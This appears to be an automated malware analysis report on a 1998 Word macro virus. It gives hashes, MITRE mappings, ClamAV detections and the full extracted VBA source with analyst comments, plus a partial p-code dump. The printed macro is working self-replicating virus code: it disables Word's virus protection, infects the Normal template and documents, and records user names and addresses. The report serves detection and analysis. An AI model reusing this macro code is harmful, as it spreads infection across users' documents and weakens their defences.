Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ec4c0cc2c7e58a5…

MALICIOUS

Office (OLE)

30.0 KB Created: 1998-11-30 17:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 583ddc8a6b4525d5608898c0af3255e9 SHA-1: ef3a2f05f746b772db1ff069196e76ec0d1bb79d SHA-256: 1ec4c0cc2c7e58a54edfe2b74459f8d16fba69eaed927766deef20d9e662221d
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic. The macro source below also supports T1137.001 Office Application Startup: Office Template Macros (it writes itself into the Normal template) and T1562.001 Impair Defenses: Disable or Modify Tools (it sets Options.VirusProtection = False); these are inferred from the code and should be confirmed by the analyst.

The sample is a malicious Word document whose VBA module runs on Document_Close and behaves as a self-replicating macro virus rather than a one-shot dropper. It checks both the active document and the Normal template for the marker string "<- this is a marker!", turns off Word's macro virus protection (Options.VirusProtection = False), and then, when exactly one side is infected and the document is saved in .doc or .dot format, exports its own module via VBProject/VBComponents to the temporary file 'c:\netldv.vxd' and imports that file into the uninfected side with CodeModule.AddFromFile (document to Normal template, or Normal template to document). When infecting the template it first appends the current time/date, Application.UserName and Application.UserAddress to the exported source as comment lines, so every generation carries a trail of prior hosts (see the trailing comment lines in the extracted script); the temporary file is removed with Kill afterwards. The result is persistence through the Normal template and propagation to every document saved on the host; the marker string and the 'c:\netldv.vxd' path are usable host-based indicators.

Heuristics 2

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9811 bytes
SHA-256: e81be6dd1b041d13f3efb85b83270b6b5005d81117ee60537cb5f90fe5d921ad
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst] Self-replicating macro virus body. Runs every time the document is
' [analyst] closed and copies its own module between the active document and the
' [analyst] Normal template, in whichever direction is not yet infected.
' [analyst] Original author comments are left verbatim; analyst notes are tagged.
Private Sub Document_Close()

On Error Resume Next    ' [analyst] every failure (e.g. VBProject access denied) is swallowed, so infection fails silently

Const Marker = "<- this is a marker!"   ' [analyst] infection marker searched for in both modules; usable as a YARA/grep indicator
Const ExportFile = "c:\netldv.vxd"      ' [analyst] transient drop path for the exported module source; host-based IOC

'Declare Variables
' [analyst] VBA quirk: only NormalTemplateInfected is declared Boolean, the other three are Variant
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim UserAddress As String


'Initialize Variables
' [analyst] ad = first VBA component of the open document, nt = first component of Normal.dot (access requires the VBA object model to be reachable)
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

' [analyst] Find returns True if the marker string occurs anywhere in the first 10000 lines/columns of each module
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
' [analyst] disables Word's macro virus warning so later infected documents open without a prompt (defense impairment)
Options.VirusProtection = False


'Make sure that some conditions are true before we continue infecting anything
' [analyst] proceed only when exactly one side is infected (Xor) and the document is stored as .doc or .dot
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  ' [analyst] direction 1: infected document -> clean Normal template (persistence)
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    ad.Export ExportFile                    'Export from the ActiveDocument

    'Write a log file of this NormalTemplate infection
    ' [analyst] flattens Application.UserAddress into VBA comment lines ("' " prefix),
    ' [analyst] turning CR into a comment continuation and dropping LF
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    ' [analyst] appends time, date, user name and address as comments to the exported source,
    ' [analyst] so each generation carries an infection trail (cf. the trailing comment lines of this sample)
    Open ExportFile For Append As #1
    Print #1, "' " & Format(Time, "hh:mm:ss AMPM - ") & _
              Format(Date, "dddd, d mmm yyyy") & _
              Chr(13) & "' " & Application.UserName & _
              Chr(13) & "' " & UserAddress
    Close #1
    
    
    nt.CodeModule.AddFromFile ExportFile    'Import into the NormalTemplate
    nt.CodeModule.DeleteLines 1, 4          'Remove some unnessesary lines
    ' [analyst] the 4 deleted lines are presumably the header Export writes ahead of the code - confirm on a live export
    
    ' [analyst] persists the infection immediately only if the template was in a saved state; otherwise it relies on Word saving the dirty template later (inferred)
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  ' [analyst] direction 2: infected Normal template -> clean document (propagation);
  ' [analyst] only for documents with a drive-letter path (2nd char of FullName is ":") or with unsaved changes
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    nt.Export ExportFile                    'Export from the NormalTemplate
    ad.CodeModule.AddFromFile ExportFile    'Import into the ActiveDocument
    ad.CodeModule.DeleteLines 1, 4          'Remove some unnessesary lines
    
    ' [analyst] same save logic as above: write the infected document only if it was already marked saved
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
    
    
  ' [analyst] cleanup: the temporary source file exists only between Export and this Kill,
  ' [analyst] so on-disk evidence is transient; look for it in MFT/journal or via file-create telemetry
  Kill ExportFile                           'Delete the file which
                                            'stores the virus's
                                            'source code

End If

End Sub

' 08:26:42  - Sonntag, 22 Nov 1998
' SPo0Ky
' Blue Planet






' Processing file: /opt/analyzer/scan_staging/379a25734294491189cb50f4b8e066e6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5325 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	Dim (Const) 
' 	LitStr 0x0014 "<- this is a marker!"
' 	VarDefn Marker
' Line #5:
' 	Dim (Const) 
' 	LitStr 0x000D "c:\netldv.vxd"
' 	VarDefn ExportFile
' Line #6:
' Line #7:
' 	QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #8:
' 	Dim 
' 	VarDefn SaveDocument
' 	VarDefn SaveNormalTemplate
' 	VarDefn DocumentInfected
' 	VarDefn NormalTemplateInfected (As Boolean)
' Line #9:
' 	Dim 
' 	VarDefn ad
' 	VarDefn nt (As Object)
' Line #10:
' 	Dim 
' 	VarDefn UserAddress (As String)
' Line #11:
' Line #12:
' Line #13:
' 	QuoteRem 0x0000 0x0014 "Initialize Variables"
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	Mem
... (truncated)